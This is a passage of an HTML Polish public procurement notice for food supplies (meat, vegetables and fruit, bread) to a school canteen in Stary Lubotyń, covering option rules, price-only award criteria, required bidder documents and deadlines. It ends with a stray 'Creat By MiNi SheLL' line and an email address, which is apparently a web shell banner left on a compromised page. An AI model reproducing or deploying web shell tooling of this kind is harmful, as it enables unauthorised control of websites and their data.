Podstawowej im. Jana Pawła II – Papieża Polaka w Starym Lubotyniu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15200000-0 - Ryby przetworzone i konserwowane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający przewiduje możliwość zastosowania prawa opcji:<br/>a) zmniejszającej w ramach poszczególnych pozycji z asortymentu – do 30%<br/>wartości zamówienia podstawowego<br/>b) zwiększającej w ramach poszczególnych pozycji z asortymentu – do 30% wartości zamówienia podstawowego.<br/>2) Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji (w całości lub w części:<br/>a) zmniejszającej – w przypadku, gdy absencja uczniów w czasie trwania roku<br/>szkolnego okaże się większa lub ilość uczniów korzystających ze stołówki będzie mniejsza niż w roku ubiegłym lub zmian w<br/>sposobie żywienia dzieci, zmian wprowadzonych w menu lub uzasadnionych okoliczności, to jest stanu<br/>epidemicznego lub innych zdarzeń spowodowanych epidemią, w szczególności takich jak zawieszenie zajęć w szkole,<br/>zamknięcie szkoły, itp, co wpłynie na zmniejszenie zapotrzebowania na produkty żywnościowe w stosunku do ilości<br/>przewidywanych;<br/>b) zwiększającej – w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy i zakup dodatkowej<br/>ilości produktu będzie konieczny do prawidłowego spełnienia obowiązku żywienia uczniów.<br/>3) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>4) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym Wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe.<br/>5) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji zwiększającej po zrealizowaniu zakresu podstawowego<br/>zamówienia – jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>6) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze najkorzystniejszą ofertę spośród nieodrzuconych ofert, na podstawie następujących kryteriów:<br/>cena ofertowa brutto (C) – waga 100% (maksymalnie 100 punktów);</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszej części zamówienia jest sukcesywna dostawa mięsa i wędlin do stołówki w Szkole Podstawowej im. Jana Pawła II – Papieża Polaka w Starym Lubotyniu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</p> <p class="mb-0">15130000-8 - Produkty mięsne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający przewiduje możliwość zastosowania prawa opcji:<br/>a) zmniejszającej w ramach poszczególnych pozycji z asortymentu – do 30%<br/>wartości zamówienia podstawowego<br/>b) zwiększającej w ramach poszczególnych pozycji z asortymentu – do 30% wartości zamówienia podstawowego.<br/>2) Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji (w całości lub w części:<br/>a) zmniejszającej – w przypadku, gdy absencja uczniów w czasie trwania roku<br/>szkolnego okaże się większa lub ilość uczniów korzystających ze stołówki będzie mniejsza niż w roku ubiegłym lub zmian w<br/>sposobie żywienia dzieci, zmian wprowadzonych w menu lub uzasadnionych okoliczności, to jest stanu<br/>epidemicznego lub innych zdarzeń spowodowanych epidemią, w szczególności takich jak zawieszenie zajęć w szkole,<br/>zamknięcie szkoły, itp, co wpłynie na zmniejszenie zapotrzebowania na produkty żywnościowe w stosunku do ilości<br/>przewidywanych;<br/>b) zwiększającej – w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy i zakup dodatkowej<br/>ilości produktu będzie konieczny do prawidłowego spełnienia obowiązku żywienia uczniów.<br/>3) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>4) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym Wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe.<br/>5) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji zwiększającej po zrealizowaniu zakresu podstawowego<br/>zamówienia – jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>6) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze najkorzystniejszą ofertę spośród nieodrzuconych ofert, na podstawie następujących kryteriów:<br/>cena ofertowa brutto (C) – waga 100% (maksymalnie 100 punktów);</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszej części zamówienia jest sukcesywna dostawa warzyw i owoców do stołówki w Szkole Podstawowej im. Jana Pawła II – Papieża Polaka w Starym Lubotyniu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03221000-6 - Warzywa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03222000-3 - Owoce i orzechy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający przewiduje możliwość zastosowania prawa opcji:<br/>a) zmniejszającej w ramach poszczególnych pozycji z asortymentu – do 30%<br/>wartości zamówienia podstawowego<br/>b) zwiększającej w ramach poszczególnych pozycji z asortymentu – do 30% wartości zamówienia podstawowego.<br/>2) Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji (w całości lub w części:<br/>a) zmniejszającej – w przypadku, gdy absencja uczniów w czasie trwania roku<br/>szkolnego okaże się większa lub ilość uczniów korzystających ze stołówki będzie mniejsza niż w roku ubiegłym lub zmian w<br/>sposobie żywienia dzieci, zmian wprowadzonych w menu lub uzasadnionych okoliczności, to jest stanu<br/>epidemicznego lub innych zdarzeń spowodowanych epidemią, w szczególności takich jak zawieszenie zajęć w szkole,<br/>zamknięcie szkoły, itp, co wpłynie na zmniejszenie zapotrzebowania na produkty żywnościowe w stosunku do ilości<br/>przewidywanych;<br/>b) zwiększającej – w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy i zakup dodatkowej<br/>ilości produktu będzie konieczny do prawidłowego spełnienia obowiązku żywienia uczniów.<br/>3) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>4) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym Wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe.<br/>5) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji zwiększającej po zrealizowaniu zakresu podstawowego<br/>zamówienia – jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>6) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze najkorzystniejszą ofertę spośród nieodrzuconych ofert, na podstawie następujących kryteriów:<br/>cena ofertowa brutto (C) – waga 100% (maksymalnie 100 punktów);</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszej części zamówienia jest sukcesywna dostawa pieczywa do stołówki w Szkole Podstawowej im. Jana Pawła II – Papieża Polaka w Starym Lubotyniu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15811000-6 - Pieczywo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający przewiduje możliwość zastosowania prawa opcji:<br/>a) zmniejszającej w ramach poszczególnych pozycji z asortymentu – do 30%<br/>wartości zamówienia podstawowego<br/>b) zwiększającej w ramach poszczególnych pozycji z asortymentu – do 30% wartości zamówienia podstawowego.<br/>2) Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji (w całości lub w części:<br/>a) zmniejszającej – w przypadku, gdy absencja uczniów w czasie trwania roku<br/>szkolnego okaże się większa lub ilość uczniów korzystających ze stołówki będzie mniejsza niż w roku ubiegłym lub zmian w<br/>sposobie żywienia dzieci, zmian wprowadzonych w menu lub uzasadnionych okoliczności, to jest stanu<br/>epidemicznego lub innych zdarzeń spowodowanych epidemią, w szczególności takich jak zawieszenie zajęć w szkole,<br/>zamknięcie szkoły, itp, co wpłynie na zmniejszenie zapotrzebowania na produkty żywnościowe w stosunku do ilości<br/>przewidywanych;<br/>b) zwiększającej – w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy i zakup dodatkowej<br/>ilości produktu będzie konieczny do prawidłowego spełnienia obowiązku żywienia uczniów.<br/>3) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>4) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym Wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe.<br/>5) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji zwiększającej po zrealizowaniu zakresu podstawowego<br/>zamówienia – jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>6) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze najkorzystniejszą ofertę spośród nieodrzuconych ofert, na podstawie następujących kryteriów:<br/>cena ofertowa brutto (C) – waga 100% (maksymalnie 100 punktów);</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty należy załączyć oświadczenie, zgodne z treścią załącznika nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie stawia warunków udziału w postępowaniu, w związku z czym nie wymaga składania podmiotowych środków<br/>dowodowych</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wraz z ofertą Wykonawca składa:<br/>1) aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu w zakresie wskazanym w Rozdziale X SWZ,<br/>zgodne z załącznikiem nr 3 do SWZ.<br/>Oświadczenie to stanowi wstępny dowód potwierdzający brak podstaw<br/>wykluczenia na dzień składania ofert. W przypadku wspólnego ubiegania się o<br/>udzielenie zamówienia, oświadczenie to składa każdy z wykonawców;<br/>2) uzupełniony formularz asortymentowo – cenowy zgodny z załącznikiem nr 2a do SWZ, zawierający ceny jednostkowe,<br/>stawkę oraz wartość podatku VAT i ceny sumaryczne poszczególnych produktów.<br/>2. Do oferty Wykonawca załącza również – jeżeli dotyczy:<br/>1) pełnomocnictwo, gdy umocowanie osoby składającej ofertę nie wynika z<br/>dokumentów rejestrowych, Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty<br/>dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia, wykonawcy zobowiązani są do ustanowienia pełnomocnika, z którego wynikać będzie umocowanie do reprezentowania w postępowaniu o udzielenie<br/>zamówienia tych wykonawców;<br/>2) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia z art. 117 ust. 4 ustawy, z którego wynika<br/>które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia<br/>Zamawiający bada, czy nie zachodzą podstawy wykluczenia wobec każdego z tych Wykonawców. W przypadku wspólnego ubiegania się o udzielenie zamówienia, oświadczenie zgodne z treścią załącznika nr 3 do SWZ składa każdy z wykonawców.<br/>W przypadku wykonawców ubiegających się wspólnie o<br/>udzielenie zamówienia, wykonawcy zobowiązani są do ustanowienia<br/>pełnomocnika, z którego wynikać będzie umocowanie do reprezentowania w<br/>postępowaniu o udzielenie zamówienia tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Z uwagi na ograniczoną pojemność pola, Zamawiający wskazuje, ze warunki zmiany umowy zostały określone w załączniku nr 4 do SWZ - projektowanych postanowieniach umownych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lubotyn</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-06 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Kwestie niewskazane w treści ogłoszenia uregulowane zostały w Specyfikacji Warunków Zamówienia wraz z załącznikami dostępnej na stronie prowadzonego postępowania.

Creat By MiNi SheLL
Email: jattceo@gmail.com